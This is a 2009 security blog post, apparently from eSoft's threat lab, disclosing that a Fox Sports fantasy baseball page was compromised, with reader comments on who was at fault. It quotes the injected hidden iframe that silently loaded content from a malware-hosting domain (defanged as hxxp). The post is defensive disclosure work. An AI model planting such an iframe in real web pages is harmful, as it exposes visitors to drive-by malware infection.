Friday, October 2, 2009

Foxsports.com Used to Serve Malware

eSoft's Threat Prevention Lab detected malicious code on the foxsports.com website late yesterday. Hackers have once again increased their tally of well known websites recently exploited to serve dangerous content.

The popular sports website was used to transparently redirect users to a dangerous site that regularly hosts malware. The compromised page contained a hidden iframe that retrieved content from the malicious site.

The URL used for the attack was part of the Fantasy Baseball Hot Streak game. Hot Streak Fantasy Baseball users should check their machines for any signs of infection or malicious activity.



The URL hxxp://msn.foxsports.com/fantasy/baseball/hotstreak/external/ contained the hidden iframe below, accessing content at hxxp://thingre.com/in.php.

<iframe src="hxxp://thingre.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>

The redirect domain thingre.com has a poor reputation, not only with eSoft but also with Google, Web of Trust and multiple URL blocklists.



The page can no longer be viewed on the Fox Sports website, and the file on the malicious site has been removed. The last malware known to be hosted at the site was a trojan.dropper variant and the payload delivered last night is assumed to be more of the same. 

3 comments:

Mike Frizzi said...

These cases always bother me because headlines like this end up getting written. Now FoxSports is having their name put up along side the word malware, and their image is being tarnished. I think that when they are caught, these people should have to pay for the damage done to this brand as part of their sentence.

Jarret said...

It's not their fault, it's the shoddy ad networks who don't do proper screening of their content.

Patrick Walsh said...

Jarret -- in most cases with big sites, you are correct -- poisoned ads are to blame. But in this instance, there were no ad networks involved and a Fox server had been compromised. I should mention that the issue is now resolved and FoxSports is not (as far as I know) serving up any malware.